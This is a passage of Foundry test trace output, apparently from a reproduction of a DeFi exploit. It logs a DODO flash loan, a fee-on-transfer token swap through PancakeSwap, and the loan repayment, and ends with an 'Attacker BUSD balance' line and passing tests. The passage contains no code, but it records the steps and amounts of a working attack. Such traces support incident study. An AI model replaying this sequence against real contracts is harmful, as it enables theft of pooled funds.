    │   │   │   │   │   │   ├─ [670] 0x89c27D81941708dBC9AA4d905443392cb4A8EF73::balanceOf(proxy3717: [0x37177ccC66ef919894CeF37596BBebd76E7A40B2]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 2525145034284378886990 [2.525e21]
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x976771c5740d431d4b0ad670671213e11a4ebb0e64ec6bafc4b9b6b0c3eeb4fc: 0 → 0x0000000000000000000000000000000000000000000001d506df79963ac3f09a
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   ├─ [670] 0x89c27D81941708dBC9AA4d905443392cb4A8EF73::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 60019436627049052858555 [6.001e22]
    │   │   │   ├─ [46733] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(60019436627049052858555 [6.001e22], 0, [0x89c27D81941708dBC9AA4d905443392cb4A8EF73, 0x55d398326f99059fF775485246999027B3197955], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1703740107 [1.703e9])
    │   │   │   │   ├─ [18416] 0x89c27D81941708dBC9AA4d905443392cb4A8EF73::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x4da070F3c4295389ddFF6d4398650001e412cB39, 60019436627049052858555 [6.001e22])
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x32A02A102Ca3ddB06CccEF17C1960Adde3c40DF0, value: 600194366270490528585 [6.001e20])
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x32A02A102Ca3ddB06CccEF17C1960Adde3c40DF0, value: 1200388732540981057171 [1.2e21])
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x4da070F3c4295389ddFF6d4398650001e412cB39, value: 58218853528237581272799 [5.821e22])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000cb5a9017fb2780b68bb → 0
    │   │   │   │   │   │   @ 0x23b2375f179ab127cb5a3b39b159945513e394fe4a4673654843878f6d80d64b: 0x0000000000000000000000000000000000000000000001756850576d067a9ef6 → 0x0000000000000000000000000000000000000000000001d7046c8be5945200d2
    │   │   │   │   │   │   @ 12: 0x0000000000000000000000000000000000000000000001756850576d067a9ef6 → 0x0000000000000000000000000000000000000000000001d7046c8be5945200d2
    │   │   │   │   │   │   @ 0x4ab81d6e72cc712c46be12a3aa6e43cec154a6027d0a40e608b497ed0c69a852: 0x000000000000000000000000000000000000000000000c346b28e06b6f4bbbfc → 0x000000000000000000000000000000000000000000001888780e2ba5597fc2db
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [893] 0x4da070F3c4295389ddFF6d4398650001e412cB39::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 205636919116882829779728 [2.056e23], 57635350154581799320572 [5.763e22], 1703740107 [1.703e9]
    │   │   │   │   ├─ [670] 0x89c27D81941708dBC9AA4d905443392cb4A8EF73::balanceOf(0x4da070F3c4295389ddFF6d4398650001e412cB39) [staticcall]
    │   │   │   │   │   └─ ← [Return] 115854203682819380593371 [1.158e23]
    │   │   │   │   ├─ [18500] 0x4da070F3c4295389ddFF6d4398650001e412cB39::swap(103207626516877170623547 [1.032e23], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 103207626516877170623547 [1.032e23])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x4da070F3c4295389ddFF6d4398650001e412cB39, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 103207626516877170623547 [1.032e23])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x4ab81d6e72cc712c46be12a3aa6e43cec154a6027d0a40e608b497ed0c69a852: 0x000000000000000000000000000000000000000000002b8b998769b68eb22310 → 0x0000000000000000000000000000000000000000000015b0b3fcee0ddceb5ed5
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000015dae58a7ba8b1c6c43b
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x4da070F3c4295389ddFF6d4398650001e412cB39) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 102429292600005659156181 [1.024e23]
    │   │   │   │   │   ├─ [670] 0x89c27D81941708dBC9AA4d905443392cb4A8EF73::balanceOf(0x4da070F3c4295389ddFF6d4398650001e412cB39) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 115854203682819380593371 [1.158e23]
    │   │   │   │   │   ├─ emit Sync(reserve0: 102429292600005659156181 [1.024e23], reserve1: 115854203682819380593371 [1.158e23])
    │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 58218853528237581272799 [5.821e22], amount0Out: 103207626516877170623547 [1.032e23], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x658d02cb000000000c346b28e06b6f4bbbfc000000002b8b998769b68eb22310 → 0x658d02cb000000001888780e2ba5597fc2db0000000015b0b3fcee0ddceb5ed5
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 103207626516877170623547 [1.032e23]
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476, 100000000000000000000000 [1e23])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476, value: 100000000000000000000000 [1e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000015dae58a7ba8b1c6c43b → 0x0000000000000000000000000000000000000000000000ade2c29a5dbb46c43b
    │   │   │   │   │   @ 0x82bcc9253272a2176c253e21a54ca24177e771a367828bd1251261eb930b899c: 0x0000000000000000000000000000000000000000000004343543268c709954c3 → 0x000000000000000000000000000000000000000000001961380b07d7671954c3
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 494114476876541139935 [4.941e20]
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 119852534577003553707203 [1.198e23]
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 494114476876541139935 [4.941e20]
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 119852534577003553707203 [1.198e23]
    │   │   ├─ emit DODOFlashLoan(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0, : 100000000000000000000000 [1e23])
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 3207626516877170623547 [3.207e21]
    ├─ emit log_named_uint(key: "Attacker BUSD balance before attack:", val: 3207626516877170623547 [3.207e21])
    ├─  storage changes:
    │   @ 0xb34209a263f6c38fe55f099e9e70f9d67e93982480ff3234a5e0108028ad164d: 0x0000000000000000000000000000000000000000000016430943571e2555a322 → 0x0000000000000000000000000000000000000000000016447929c7a968f0a322
    │   @ 1: 0x0000000000000000000001010000000000000000000000000000000000000000 → 0x0000000000000000000000010000000000000000000000000000000000000000
    │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 14.45s (13.03s CPU time)

Ran 2 test suites in 15.25s (15.00s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
